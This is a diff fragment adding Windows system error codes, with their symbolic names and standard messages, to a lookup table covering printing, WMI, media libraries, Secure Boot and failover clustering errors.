+ 0x000007e1: ("ERROR_INVALID_COLORSPACE", "The specified color space is invalid."),
+ 0x000007e2: ("ERROR_ICM_NOT_ENABLED", "Image Color Management is not enabled."),
+ 0x000007e3: ("ERROR_DELETING_ICM_XFORM", "There was an error while deleting the color transform."),
+ 0x000007e4: ("ERROR_INVALID_TRANSFORM", "The specified color transform is invalid."),
+ 0x000007e5: ("ERROR_COLORSPACE_MISMATCH", "The specified transform does not match the bitmap's color space."),
+ 0x000007e6: ("ERROR_INVALID_COLORINDEX", "The specified named color index is not present in the profile."),
+ 0x000007e7: ("ERROR_PROFILE_DOES_NOT_MATCH_DEVICE", "The specified profile is intended for a device of a different type than the specified device."),
+ 0x0000083c: ("ERROR_CONNECTED_OTHER_PASSWORD", "The network connection was made successfully, but the user had to be prompted for a password other than the one originally specified."),
+ 0x0000083d: ("ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT", "The network connection was made successfully using default credentials."),
+ 0x0000089a: ("ERROR_BAD_USERNAME", "The specified username is invalid."),
+ 0x000008ca: ("ERROR_NOT_CONNECTED", "This network connection does not exist."),
+ 0x00000961: ("ERROR_OPEN_FILES", "This network connection has files open or requests pending."),
+ 0x00000962: ("ERROR_ACTIVE_CONNECTIONS", "Active connections still exist."),
+ 0x00000964: ("ERROR_DEVICE_IN_USE", "The device is in use by an active process and cannot be disconnected."),
+ 0x00000bb8: ("ERROR_UNKNOWN_PRINT_MONITOR", "The specified print monitor is unknown."),
+ 0x00000bb9: ("ERROR_PRINTER_DRIVER_IN_USE", "The specified printer driver is currently in use."),
+ 0x00000bba: ("ERROR_SPOOL_FILE_NOT_FOUND", "The spool file was not found."),
+ 0x00000bbb: ("ERROR_SPL_NO_STARTDOC", "A StartDocPrinter call was not issued."),
+ 0x00000bbc: ("ERROR_SPL_NO_ADDJOB", "An AddJob call was not issued."),
+ 0x00000bbd: ("ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED", "The specified print processor has already been installed."),
+ 0x00000bbe: ("ERROR_PRINT_MONITOR_ALREADY_INSTALLED", "The specified print monitor has already been installed."),
+ 0x00000bbf: ("ERROR_INVALID_PRINT_MONITOR", "The specified print monitor does not have the required functions."),
+ 0x00000bc0: ("ERROR_PRINT_MONITOR_IN_USE", "The specified print monitor is currently in use."),
+ 0x00000bc1: ("ERROR_PRINTER_HAS_JOBS_QUEUED", "The requested operation is not allowed when there are jobs queued to the printer."),
+ 0x00000bc2: ("ERROR_SUCCESS_REBOOT_REQUIRED", "The requested operation is successful. Changes will not be effective until the system is rebooted."),
+ 0x00000bc3: ("ERROR_SUCCESS_RESTART_REQUIRED", "The requested operation is successful. Changes will not be effective until the service is restarted."),
+ 0x00000bc4: ("ERROR_PRINTER_NOT_FOUND", "No printers were found."),
+ 0x00000bc5: ("ERROR_PRINTER_DRIVER_WARNED", "The printer driver is known to be unreliable."),
+ 0x00000bc6: ("ERROR_PRINTER_DRIVER_BLOCKED", "The printer driver is known to harm the system."),
+ 0x00000bc7: ("ERROR_PRINTER_DRIVER_PACKAGE_IN_USE", "The specified printer driver package is currently in use."),
+ 0x00000bc8: ("ERROR_CORE_DRIVER_PACKAGE_NOT_FOUND", "Unable to find a core driver package that is required by the printer driver package."),
+ 0x00000bc9: ("ERROR_FAIL_REBOOT_REQUIRED", "The requested operation failed. A system reboot is required to roll back changes made."),
+ 0x00000bca: ("ERROR_FAIL_REBOOT_INITIATED", "The requested operation failed. A system reboot has been initiated to roll back changes made."),
+ 0x00000bcb: ("ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED", "The specified printer driver was not found on the system and needs to be downloaded."),
+ 0x00000bcc: ("ERROR_PRINT_JOB_RESTART_REQUIRED", "The requested print job has failed to print. A print system update requires the job to be resubmitted."),
+ 0x00000bcd: ("ERROR_INVALID_PRINTER_DRIVER_MANIFEST", "The printer driver does not contain a valid manifest, or contains too many manifests."),
+ 0x00000bce: ("ERROR_PRINTER_NOT_SHAREABLE", "The specified printer cannot be shared."),
+ 0x00000bea: ("ERROR_REQUEST_PAUSED", "The operation was paused."),
+ 0x00000f6e: ("ERROR_IO_REISSUE_AS_CACHED", "Reissue the given operation as a cached IO operation"),
+ 0x00000fa0: ("ERROR_WINS_INTERNAL", "WINS encountered an error while processing the command."),
+ 0x00000fa1: ("ERROR_CAN_NOT_DEL_LOCAL_WINS", "The local WINS cannot be deleted."),
+ 0x00000fa2: ("ERROR_STATIC_INIT", "The importation from the file failed."),
+ 0x00000fa3: ("ERROR_INC_BACKUP", "The backup failed. Was a full backup done before?"),
+ 0x00000fa4: ("ERROR_FULL_BACKUP", "The backup failed. Check the directory to which you are backing the database."),
+ 0x00000fa5: ("ERROR_REC_NON_EXISTENT", "The name does not exist in the WINS database."),
+ 0x00000fa6: ("ERROR_RPL_NOT_ALLOWED", "Replication with a nonconfigured partner is not allowed."),
+ 0x00000fd2: ("PEERDIST_ERROR_CONTENTINFO_VERSION_UNSUPPORTED", "The version of the supplied content information is not supported."),
+ 0x00000fd3: ("PEERDIST_ERROR_CANNOT_PARSE_CONTENTINFO", "The supplied content information is malformed."),
+ 0x00000fd4: ("PEERDIST_ERROR_MISSING_DATA", "The requested data cannot be found in local or peer caches."),
+ 0x00000fd5: ("PEERDIST_ERROR_NO_MORE", "No more data is available or required."),
+ 0x00000fd6: ("PEERDIST_ERROR_NOT_INITIALIZED", "The supplied object has not been initialized."),
+ 0x00000fd7: ("PEERDIST_ERROR_ALREADY_INITIALIZED", "The supplied object has already been initialized."),
+ 0x00000fd8: ("PEERDIST_ERROR_SHUTDOWN_IN_PROGRESS", "A shutdown operation is already in progress."),
+ 0x00000fd9: ("PEERDIST_ERROR_INVALIDATED", "The supplied object has already been invalidated."),
+ 0x00000fda: ("PEERDIST_ERROR_ALREADY_EXISTS", "An element already exists and was not replaced."),
+ 0x00000fdb: ("PEERDIST_ERROR_OPERATION_NOTFOUND", "Can not cancel the requested operation as it has already been completed."),
+ 0x00000fdc: ("PEERDIST_ERROR_ALREADY_COMPLETED", "Can not perform the reqested operation because it has already been carried out."),
+ 0x00000fdd: ("PEERDIST_ERROR_OUT_OF_BOUNDS", "An operation accessed data beyond the bounds of valid data."),
+ 0x00000fde: ("PEERDIST_ERROR_VERSION_UNSUPPORTED", "The requested version is not supported."),
+ 0x00000fdf: ("PEERDIST_ERROR_INVALID_CONFIGURATION", "A configuration value is invalid."),
+ 0x00000fe0: ("PEERDIST_ERROR_NOT_LICENSED", "The SKU is not licensed."),
+ 0x00000fe1: ("PEERDIST_ERROR_SERVICE_UNAVAILABLE", "PeerDist Service is still initializing and will be available shortly."),
+ 0x00000fe2: ("PEERDIST_ERROR_TRUST_FAILURE", "Communication with one or more computers will be temporarily blocked due to recent errors."),
+ 0x00001004: ("ERROR_DHCP_ADDRESS_CONFLICT", "The DHCP client has obtained an IP address that is already in use on the network. The local interface will be disabled until the DHCP client can obtain a new address."),
+ 0x00001068: ("ERROR_WMI_GUID_NOT_FOUND", "The GUID passed was not recognized as valid by a WMI data provider."),
+ 0x00001069: ("ERROR_WMI_INSTANCE_NOT_FOUND", "The instance name passed was not recognized as valid by a WMI data provider."),
+ 0x0000106a: ("ERROR_WMI_ITEMID_NOT_FOUND", "The data item ID passed was not recognized as valid by a WMI data provider."),
+ 0x0000106b: ("ERROR_WMI_TRY_AGAIN", "The WMI request could not be completed and should be retried."),
+ 0x0000106c: ("ERROR_WMI_DP_NOT_FOUND", "The WMI data provider could not be located."),
+ 0x0000106d: ("ERROR_WMI_UNRESOLVED_INSTANCE_REF", "The WMI data provider references an instance set that has not been registered."),
+ 0x0000106e: ("ERROR_WMI_ALREADY_ENABLED", "The WMI data block or event notification has already been enabled."),
+ 0x0000106f: ("ERROR_WMI_GUID_DISCONNECTED", "The WMI data block is no longer available."),
+ 0x00001070: ("ERROR_WMI_SERVER_UNAVAILABLE", "The WMI data service is not available."),
+ 0x00001071: ("ERROR_WMI_DP_FAILED", "The WMI data provider failed to carry out the request."),
+ 0x00001072: ("ERROR_WMI_INVALID_MOF", "The WMI MOF information is not valid."),
+ 0x00001073: ("ERROR_WMI_INVALID_REGINFO", "The WMI registration information is not valid."),
+ 0x00001074: ("ERROR_WMI_ALREADY_DISABLED", "The WMI data block or event notification has already been disabled."),
+ 0x00001075: ("ERROR_WMI_READ_ONLY", "The WMI data item or data block is read only."),
+ 0x00001076: ("ERROR_WMI_SET_FAILURE", "The WMI data item or data block could not be changed."),
+ 0x0000109a: ("ERROR_NOT_APPCONTAINER", "This operation is only valid in the context of an app container."),
+ 0x0000109b: ("ERROR_APPCONTAINER_REQUIRED", "This application can only run in the context of an app container."),
+ 0x0000109c: ("ERROR_NOT_SUPPORTED_IN_APPCONTAINER", "This functionality is not supported in the context of an app container."),
+ 0x0000109d: ("ERROR_INVALID_PACKAGE_SID_LENGTH", "The length of the SID supplied is not a valid length for app container SIDs."),
+ 0x000010cc: ("ERROR_INVALID_MEDIA", "The media identifier does not represent a valid medium."),
+ 0x000010cd: ("ERROR_INVALID_LIBRARY", "The library identifier does not represent a valid library."),
+ 0x000010ce: ("ERROR_INVALID_MEDIA_POOL", "The media pool identifier does not represent a valid media pool."),
+ 0x000010cf: ("ERROR_DRIVE_MEDIA_MISMATCH", "The drive and medium are not compatible or exist in different libraries."),
+ 0x000010d0: ("ERROR_MEDIA_OFFLINE", "The medium currently exists in an offline library and must be online to perform this operation."),
+ 0x000010d1: ("ERROR_LIBRARY_OFFLINE", "The operation cannot be performed on an offline library."),
+ 0x000010d2: ("ERROR_EMPTY", "The library, drive, or media pool is empty."),
+ 0x000010d3: ("ERROR_NOT_EMPTY", "The library, drive, or media pool must be empty to perform this operation."),
+ 0x000010d4: ("ERROR_MEDIA_UNAVAILABLE", "No media is currently available in this media pool or library."),
+ 0x000010d5: ("ERROR_RESOURCE_DISABLED", "A resource required for this operation is disabled."),
+ 0x000010d6: ("ERROR_INVALID_CLEANER", "The media identifier does not represent a valid cleaner."),
+ 0x000010d7: ("ERROR_UNABLE_TO_CLEAN", "The drive cannot be cleaned or does not support cleaning."),
+ 0x000010d8: ("ERROR_OBJECT_NOT_FOUND", "The object identifier does not represent a valid object."),
+ 0x000010d9: ("ERROR_DATABASE_FAILURE", "Unable to read from or write to the database."),
+ 0x000010da: ("ERROR_DATABASE_FULL", "The database is full."),
+ 0x000010db: ("ERROR_MEDIA_INCOMPATIBLE", "The medium is not compatible with the device or media pool."),
+ 0x000010dc: ("ERROR_RESOURCE_NOT_PRESENT", "The resource required for this operation does not exist."),
+ 0x000010dd: ("ERROR_INVALID_OPERATION", "The operation identifier is not valid."),
+ 0x000010de: ("ERROR_MEDIA_NOT_AVAILABLE", "The media is not mounted or ready for use."),
+ 0x000010df: ("ERROR_DEVICE_NOT_AVAILABLE", "The device is not ready for use."),
+ 0x000010e0: ("ERROR_REQUEST_REFUSED", "The operator or administrator has refused the request."),
+ 0x000010e1: ("ERROR_INVALID_DRIVE_OBJECT", "The drive identifier does not represent a valid drive."),
+ 0x000010e2: ("ERROR_LIBRARY_FULL", "Library is full. No slot is available for use."),
+ 0x000010e3: ("ERROR_MEDIUM_NOT_ACCESSIBLE", "The transport cannot access the medium."),
+ 0x000010e4: ("ERROR_UNABLE_TO_LOAD_MEDIUM", "Unable to load the medium into the drive."),
+ 0x000010e5: ("ERROR_UNABLE_TO_INVENTORY_DRIVE", "Unable to retrieve the drive status."),
+ 0x000010e6: ("ERROR_UNABLE_TO_INVENTORY_SLOT", "Unable to retrieve the slot status."),
+ 0x000010e7: ("ERROR_UNABLE_TO_INVENTORY_TRANSPORT", "Unable to retrieve status about the transport."),
+ 0x000010e8: ("ERROR_TRANSPORT_FULL", "Cannot use the transport because it is already in use."),
+ 0x000010e9: ("ERROR_CONTROLLING_IEPORT", "Unable to open or close the inject/eject port."),
+ 0x000010ea: ("ERROR_UNABLE_TO_EJECT_MOUNTED_MEDIA", "Unable to eject the medium because it is in a drive."),
+ 0x000010eb: ("ERROR_CLEANER_SLOT_SET", "A cleaner slot is already reserved."),
+ 0x000010ec: ("ERROR_CLEANER_SLOT_NOT_SET", "A cleaner slot is not reserved."),
+ 0x000010ed: ("ERROR_CLEANER_CARTRIDGE_SPENT", "The cleaner cartridge has performed the maximum number of drive cleanings."),
+ 0x000010ee: ("ERROR_UNEXPECTED_OMID", "Unexpected on-medium identifier."),
+ 0x000010ef: ("ERROR_CANT_DELETE_LAST_ITEM", "The last remaining item in this group or resource cannot be deleted."),
+ 0x000010f0: ("ERROR_MESSAGE_EXCEEDS_MAX_SIZE", "The message provided exceeds the maximum size allowed for this parameter."),
+ 0x000010f1: ("ERROR_VOLUME_CONTAINS_SYS_FILES", "The volume contains system or paging files."),
+ 0x000010f2: ("ERROR_INDIGENOUS_TYPE", "The media type cannot be removed from this library since at least one drive in the library reports it can support this media type."),
+ 0x000010f3: ("ERROR_NO_SUPPORTING_DRIVES", "This offline media cannot be mounted on this system since no enabled drives are present which can be used."),
+ 0x000010f4: ("ERROR_CLEANER_CARTRIDGE_INSTALLED", "A cleaner cartridge is present in the tape library."),
+ 0x000010f5: ("ERROR_IEPORT_FULL", "Cannot use the inject/eject port because it is not empty."),
+ 0x000010fe: ("ERROR_FILE_OFFLINE", "This file is currently not available for use on this computer."),
+ 0x000010ff: ("ERROR_REMOTE_STORAGE_NOT_ACTIVE", "The remote storage service is not operational at this time."),
+ 0x00001100: ("ERROR_REMOTE_STORAGE_MEDIA_ERROR", "The remote storage service encountered a media error."),
+ 0x00001126: ("ERROR_NOT_A_REPARSE_POINT", "The file or directory is not a reparse point."),
+ 0x00001127: ("ERROR_REPARSE_ATTRIBUTE_CONFLICT", "The reparse point attribute cannot be set because it conflicts with an existing attribute."),
+ 0x00001128: ("ERROR_INVALID_REPARSE_DATA", "The data present in the reparse point buffer is invalid."),
+ 0x00001129: ("ERROR_REPARSE_TAG_INVALID", "The tag present in the reparse point buffer is invalid."),
+ 0x0000112a: ("ERROR_REPARSE_TAG_MISMATCH", "There is a mismatch between the tag specified in the request and the tag present in the reparse point."),
+ 0x00001130: ("ERROR_APP_DATA_NOT_FOUND", "Fast Cache data not found."),
+ 0x00001131: ("ERROR_APP_DATA_EXPIRED", "Fast Cache data expired."),
+ 0x00001132: ("ERROR_APP_DATA_CORRUPT", "Fast Cache data corrupt."),
+ 0x00001133: ("ERROR_APP_DATA_LIMIT_EXCEEDED", "Fast Cache data has exceeded its max size and cannot be updated."),
+ 0x00001134: ("ERROR_APP_DATA_REBOOT_REQUIRED", "Fast Cache has been ReArmed and requires a reboot until it can be updated."),
+ 0x00001144: ("ERROR_SECUREBOOT_ROLLBACK_DETECTED", "Secure Boot detected that rollback of protected data has been attempted."),
+ 0x00001145: ("ERROR_SECUREBOOT_POLICY_VIOLATION", "The value is protected by Secure Boot policy and cannot be modified or deleted."),
+ 0x00001146: ("ERROR_SECUREBOOT_INVALID_POLICY", "The Secure Boot policy is invalid."),
+ 0x00001147: ("ERROR_SECUREBOOT_POLICY_PUBLISHER_NOT_FOUND", "A new Secure Boot policy did not contain the current publisher on its update list."),
+ 0x00001148: ("ERROR_SECUREBOOT_POLICY_NOT_SIGNED", "The Secure Boot policy is either not signed or is signed by a non-trusted signer."),
+ 0x00001149: ("ERROR_SECUREBOOT_NOT_ENABLED", "Secure Boot is not enabled on this machine."),
+ 0x0000114a: ("ERROR_SECUREBOOT_FILE_REPLACED", "Secure Boot requires that certain files and drivers are not replaced by other files or drivers."),
+ 0x00001158: ("ERROR_OFFLOAD_READ_FLT_NOT_SUPPORTED", "The copy offload read operation is not supported by a filter."),
+ 0x00001159: ("ERROR_OFFLOAD_WRITE_FLT_NOT_SUPPORTED", "The copy offload write operation is not supported by a filter."),
+ 0x0000115a: ("ERROR_OFFLOAD_READ_FILE_NOT_SUPPORTED", "The copy offload read operation is not supported for the file."),
+ 0x0000115b: ("ERROR_OFFLOAD_WRITE_FILE_NOT_SUPPORTED", "The copy offload write operation is not supported for the file."),
+ 0x00001194: ("ERROR_VOLUME_NOT_SIS_ENABLED", "Single Instance Storage is not available on this volume."),
+ 0x00001389: ("ERROR_DEPENDENT_RESOURCE_EXISTS", "The operation cannot be completed because other resources are dependent on this resource."),
+ 0x0000138a: ("ERROR_DEPENDENCY_NOT_FOUND", "The cluster resource dependency cannot be found."),
+ 0x0000138b: ("ERROR_DEPENDENCY_ALREADY_EXISTS", "The cluster resource cannot be made dependent on the specified resource because it is already dependent."),
+ 0x0000138c: ("ERROR_RESOURCE_NOT_ONLINE", "The cluster resource is not online."),
+ 0x0000138d: ("ERROR_HOST_NODE_NOT_AVAILABLE", "A cluster node is not available for this operation."),
+ 0x0000138e: ("ERROR_RESOURCE_NOT_AVAILABLE", "The cluster resource is not available."),
+ 0x0000138f: ("ERROR_RESOURCE_NOT_FOUND", "The cluster resource could not be found."),
+ 0x00001390: ("ERROR_SHUTDOWN_CLUSTER", "The cluster is being shut down."),
+ 0x00001391: ("ERROR_CANT_EVICT_ACTIVE_NODE", "A cluster node cannot be evicted from the cluster unless the node is down or it is the last node."),
+ 0x00001392: ("ERROR_OBJECT_ALREADY_EXISTS", "The object already exists."),
+ 0x00001393: ("ERROR_OBJECT_IN_LIST", "The object is already in the list."),
+ 0x00001394: ("ERROR_GROUP_NOT_AVAILABLE", "The cluster group is not available for any new requests."),
+ 0x00001395: ("ERROR_GROUP_NOT_FOUND", "The cluster group could not be found."),
+ 0x00001396: ("ERROR_GROUP_NOT_ONLINE", "The operation could not be completed because the cluster group is not online."),
+ 0x00001397: ("ERROR_HOST_NODE_NOT_RESOURCE_OWNER", "The operation failed because either the specified cluster node is not the owner of the resource, or the node is not a possible owner of the resource."),
+ 0x00001398: ("ERROR_HOST_NODE_NOT_GROUP_OWNER", "The operation failed because either the specified cluster node is not the owner of the group, or the node is not a possible owner of the group."),
+ 0x00001399: ("ERROR_RESMON_CREATE_FAILED", "The cluster resource could not be created in the specified resource monitor."),
+ 0x0000139a: ("ERROR_RESMON_ONLINE_FAILED", "The cluster resource could not be brought online by the resource monitor."),
+ 0x0000139b: ("ERROR_RESOURCE_ONLINE", "The operation could not be completed because the cluster resource is online."),
+ 0x0000139c: ("ERROR_QUORUM_RESOURCE", "The cluster resource could not be deleted or brought offline because it is the quorum resource."),
+ 0x0000139d: ("ERROR_NOT_QUORUM_CAPABLE", "The cluster could not make the specified resource a quorum resource because it is not capable of being a quorum resource."),
+ 0x0000139e: ("ERROR_CLUSTER_SHUTTING_DOWN", "The cluster software is shutting down."),
+ 0x0000139f: ("ERROR_INVALID_STATE", "The group or resource is not in the correct state to perform the requested operation."),
+ 0x000013a0: ("ERROR_RESOURCE_PROPERTIES_STORED", "The properties were stored but not all changes will take effect until the next time the resource is brought online."),
+ 0x000013a1: ("ERROR_NOT_QUORUM_CLASS", "The cluster could not make the specified resource a quorum resource because it does not belong to a shared storage class."),
+ 0x000013a2: ("ERROR_CORE_RESOURCE", "The cluster resource could not be deleted since it is a core resource."),
+ 0x000013a3: ("ERROR_QUORUM_RESOURCE_ONLINE_FAILED", "The quorum resource failed to come online."),
+ 0x000013a4: ("ERROR_QUORUMLOG_OPEN_FAILED", "The quorum log could not be created or mounted successfully."),
+ 0x000013a5: ("ERROR_CLUSTERLOG_CORRUPT", "The cluster log is corrupt."),
+ 0x000013a6: ("ERROR_CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE", "The record could not be written to the cluster log since it exceeds the maximum size."),
+ 0x000013a7: ("ERROR_CLUSTERLOG_EXCEEDS_MAXSIZE", "The cluster log exceeds its maximum size."),
+ 0x000013a8: ("ERROR_CLUSTERLOG_CHKPOINT_NOT_FOUND", "No checkpoint record was found in the cluster log."),
+ 0x000013a9: ("ERROR_CLUSTERLOG_NOT_ENOUGH_SPACE", "The minimum required disk space needed for logging is not available."),
+ 0x000013aa: ("ERROR_QUORUM_OWNER_ALIVE", "The cluster node failed to take control of the quorum resource because the resource is owned by another active node."),
+ 0x000013ab: ("ERROR_NETWORK_NOT_AVAILABLE", "A cluster network is not available for this operation."),
+ 0x000013ac: ("ERROR_NODE_NOT_AVAILABLE", "A cluster node is not available for this operation."),
+ 0x000013ad: ("ERROR_ALL_NODES_NOT_AVAILABLE", "All cluster nodes must be running to perform this operation."),
+ 0x000013ae: ("ERROR_RESOURCE_FAILED", "A cluster resource failed."),
+ 0x000013af: ("ERROR_CLUSTER_INVALID_NODE", "The cluster node is not valid."),
+ 0x000013b0: ("ERROR_CLUSTER_NODE_EXISTS", "The cluster node already exists."),
+ 0x000013b1: ("ERROR_CLUSTER_JOIN_IN_PROGRESS", "A node is in the process of joining the cluster."),
+ 0x000013b2: ("ERROR_CLUSTER_NODE_NOT_FOUND", "The cluster node was not found."),
+ 0x000013b3: ("ERROR_CLUSTER_LOCAL_NODE_NOT_FOUND", "The cluster local node information was not found."),
+ 0x000013b4: ("ERROR_CLUSTER_NETWORK_EXISTS", "The cluster network already exists."),
+ 0x000013b5: ("ERROR_CLUSTER_NETWORK_NOT_FOUND", "The cluster network was not found."),
+ 0x000013b6: ("ERROR_CLUSTER_NETINTERFACE_EXISTS", "The cluster network interface already exists."),
+ 0x000013b7: ("ERROR_CLUSTER_NETINTERFACE_NOT_FOUND", "The cluster network interface was not found."),
+ 0x000013b8: ("ERROR_CLUSTER_INVALID_REQUEST", "The cluster request is not valid for this object."),
+ 0x000013b9: ("ERROR_CLUSTER_INVALID_NETWORK_PROVIDER", "The cluster network provider is not valid."),
+ 0x000013ba: ("ERROR_CLUSTER_NODE_DOWN", "The cluster node is down."),
+ 0x000013bb: ("ERROR_CLUSTER_NODE_UNREACHABLE", "The cluster node is not reachable."),
+ 0x000013bc: ("ERROR_CLUSTER_NODE_NOT_MEMBER", "The cluster node is not a member of the cluster."),
+ 0x000013bd: ("ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS", "A cluster join operation is not in progress."),
+ 0x000013be: ("ERROR_CLUSTER_INVALID_NETWORK", "The cluster network is not valid."),
+ 0x000013c0: ("ERROR_CLUSTER_NODE_UP", "The cluster node is up."),
+ 0x000013c1: ("ERROR_CLUSTER_IPADDR_IN_USE", "The cluster IP address is already in use."),
+ 0x000013c2: ("ERROR_CLUSTER_NODE_NOT_PAUSED", "The cluster node is not paused."),
+ 0x000013c3: ("ERROR_CLUSTER_NO_SECURITY_CONTEXT", "No cluster security context is available."),
+ 0x000013c4: ("ERROR_CLUSTER_NETWORK_NOT_INTERNAL", "The cluster network is not configured for internal cluster communication."),
+ 0x000013c5: ("ERROR_CLUSTER_NODE_ALREADY_UP", "The cluster node is already up."),
+ 0x000013c6: ("ERROR_CLUSTER_NODE_ALREADY_DOWN", "The cluster node is already down."),
+ 0x000013c7: ("ERROR_CLUSTER_NETWORK_ALREADY_ONLINE", "The cluster network is already online."),
+ 0x000013c8: ("ERROR_CLUSTER_NETWORK_ALREADY_OFFLINE", "The cluster network is already offline."),
+ 0x000013c9: ("ERROR_CLUSTER_NODE_ALREADY_MEMBER", "The cluster node is already a member of the cluster."),
+ 0x000013ca: ("ERROR_CLUSTER_LAST_INTERNAL_NETWORK", "The cluster network is the only one configured for internal cluster communication between two or more active cluster nodes. The internal communication capability cannot be removed from the network."),
+ 0x000013cb: ("ERROR_CLUSTER_NETWORK_HAS_DEPENDENTS", "One or more cluster resources depend on the network to provide service to clients. The client access capability cannot be removed from the network."),
+ 0x000013cc: ("ERROR_INVALID_OPERATION_ON_QUORUM", "This operation cannot be performed on the cluster resource as it the quorum resource. You may not bring the quorum resource offline or modify its possible owners list."),
+ 0x000013cd: ("ERROR_DEPENDENCY_NOT_ALLOWED", "The cluster quorum resource is not allowed to have any dependencies."),
+ 0x000013ce: ("ERROR_CLUSTER_NODE_PAUSED", "The cluster node is paused."),
+ 0x000013cf: ("ERROR_NODE_CANT_HOST_RESOURCE", "The cluster resource cannot be brought online. The owner node cannot run this resource."),
+ 0x000013d0: ("ERROR_CLUSTER_NODE_NOT_READY", "The cluster node is not ready to perform the requested operation."),
+ 0x000013d1: ("ERROR_CLUSTER_NODE_SHUTTING_DOWN", "The cluster node is shutting down."),
+ 0x000013d2: ("ERROR_CLUSTER_JOIN_ABORTED", "The cluster join operation was aborted."),
+ 0x000013d3: ("ERROR_CLUSTER_INCOMPATIBLE_VERSIONS", "The cluster join operation failed due to incompatible software versions between the joining node and its sponsor."),
+ 0x000013d4: ("ERROR_CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED", "This resource cannot be created because the cluster has reached the limit on the number of resources it can monitor."),
+ 0x000013d5: ("ERROR_CLUSTER_SYSTEM_CONFIG_CHANGED", "The system configuration changed during the cluster join or form operation. The join or form operation was aborted."),
+ 0x000013d6: ("ERROR_CLUSTER_RESOURCE_TYPE_NOT_FOUND", "The specified resource type was not found."),
+ 0x000013d7: ("ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED", "The specified node does not support a resource of this type. This may be due to version inconsistencies or due to the absence of the resource DLL on this node."),
+ 0x000013d8: ("ERROR_CLUSTER_RESNAME_NOT_FOUND", "The specified resource name is not supported by this resource DLL. This may be due to a bad (or changed) name supplied to the resource DLL."),
+ 0x000013d9: ("ERROR_CLUSTER_NO_RPC_PACKAGES_REGISTERED", "No authentication package could be registered with the RPC server."),
+ 0x000013da: ("ERROR_CLUSTER_OWNER_NOT_IN_PREFLIST", "You cannot bring the group online because the owner of the group is not in the preferred list for the group. To change the owner node for the group, move the group."),
+ 0x000013db: ("ERROR_CLUSTER_DATABASE_SEQMISMATCH", "The join operation failed because the cluster database sequence number has changed or is incompatible with the locker node. This may happen during a join operation if the cluster database was changing during the join."),
+ 0x000013dc: ("ERROR_RESMON_INVALID_STATE", "The resource monitor will not allow the fail operation to be performed while the resource is in its current state. This may happen if the resource is in a pending state."),
+ 0x000013dd: ("ERROR_CLUSTER_GUM_NOT_LOCKER", "A non locker code got a request to reserve the lock for making global updates."),
+ 0x000013de: ("ERROR_QUORUM_DISK_NOT_FOUND", "The quorum disk could not be located by the cluster service."),
+ 0x000013df: ("ERROR_DATABASE_BACKUP_CORRUPT", "The backed up cluster database is possibly corrupt."),
+ 0x000013e0: ("ERROR_CLUSTER_NODE_ALREADY_HAS_DFS_ROOT", "A DFS root already exists in this cluster node."),
+ 0x000013e1: ("ERROR_RESOURCE_PROPERTY_UNCHANGEABLE", "An attempt to modify a resource property failed because it conflicts with another existing property."),
+ 0x00001702: ("ERROR_CLUSTER_MEMBERSHIP_INVALID_STATE", "An operation was attempted that is incompatible with the current membership state of the node."),
+ 0x00001703: ("ERROR_CLUSTER_QUORUMLOG_NOT_FOUND", "The quorum resource does not contain the quorum log."),
+ 0x00001704: ("ERROR_CLUSTER_MEMBERSHIP_HALT", "The membership engine requested shutdown of the cluster service on this node."),
+ 0x00001705: ("ERROR_CLUSTER_INSTANCE_ID_MISMATCH", "The join operation failed because the cluster instance ID of the joining node does not match the cluster instance ID of the sponsor node."),
+ 0x00001706: ("ERROR_CLUSTER_NETWORK_NOT_FOUND_FOR_IP", "A matching cluster network for the specified IP address could not be found."),
+ 0x00001707: ("ERROR_CLUSTER_PROPERTY_DATA_TYPE_MISMATCH", "The actual data type of the property did not match the expected data type of the property."),
+ 0x00001708: ("ERROR_CLUSTER_EVICT_WITHOUT_CLEANUP", "The cluster node was evicted from the cluster successfully, but the node was not cleaned up. To determine what cleanup steps failed and how to recover, see the Failover Clustering application event log using Event Viewer."),
+ 0x00001709: ("ERROR_CLUSTER_PARAMETER_MISMATCH", "Two or more parameter values specified for a resource's properties are in conflict."),
+ 0x0000170a: ("ERROR_NODE_CANNOT_BE_CLUSTERED", "This computer cannot be made a member of a cluster."),
+ 0x0000170b: ("ERROR_CLUSTER_WRONG_OS_VERSION", "This computer cannot be made a member of a cluster because it does not have the correct version of Windows installed."),
+ 0x0000170c: ("ERROR_CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME", "A cluster cannot be created with the specified cluster name because that cluster name is already in use. Specify a different name for the cluster."),
+ 0x0000170d: ("ERROR_CLUSCFG_ALREADY_COMMITTED", "The cluster configuration action has already been committed."),
+ 0x0000170e: ("ERROR_CLUSCFG_ROLLBACK_FAILED", "The cluster configuration action could not be rolled back."),
+ 0x0000170f: ("ERROR_CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT", "The drive letter assigned to a system disk on one node conflicted with the drive letter assigned to a disk on another node."),
+ 0x00001710: ("ERROR_CLUSTER_OLD_VERSION", "One or more nodes in the cluster are running a version of Windows that does not support this operation."),
+ 0x00001711: ("ERROR_CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME", "The name of the corresponding computer account doesn't match the Network Name for this resource."),
+ 0x00001712: ("ERROR_CLUSTER_NO_NET_ADAPTERS", "No network adapters are available."),
+ 0x00001713: ("ERROR_CLUSTER_POISONED", "The cluster node has been poisoned."),
+ 0x00001714: ("ERROR_CLUSTER_GROUP_MOVING", "The group is unable to accept the request since it is moving to another node."),
+ 0x00001715: ("ERROR_CLUSTER_RESOURCE_TYPE_BUSY", "The resource type cannot accept the request since is too busy performing another operation."),
+ 0x00001716: ("ERROR_RESOURCE_CALL_TIMED_OUT", "The call to the cluster resource DLL timed out."),
+ 0x00001717: ("ERROR_INVALID_CLUSTER_IPV6_ADDRESS", "The address is not valid for an IPv6 Address resource. A global IPv6 address is required, and it must match a cluster network. Compatibility addresses are not permitted."),
+ 0x00001718: ("ERROR_CLUSTER_INTERNAL_INVALID_FUNCTION", "An internal cluster error occurred. A call to an invalid function was attempted."),
+ 0x00001719: ("ERROR_CLUSTER_PARAMETER_OUT_OF_BOUNDS", "A parameter value is out of acceptable range."),
+ 0x0000171a: ("ERROR_CLUSTER_PARTIAL_SEND", "A network error occurred while sending data to another node in the cluster. The number of bytes transmitted was less than required."),
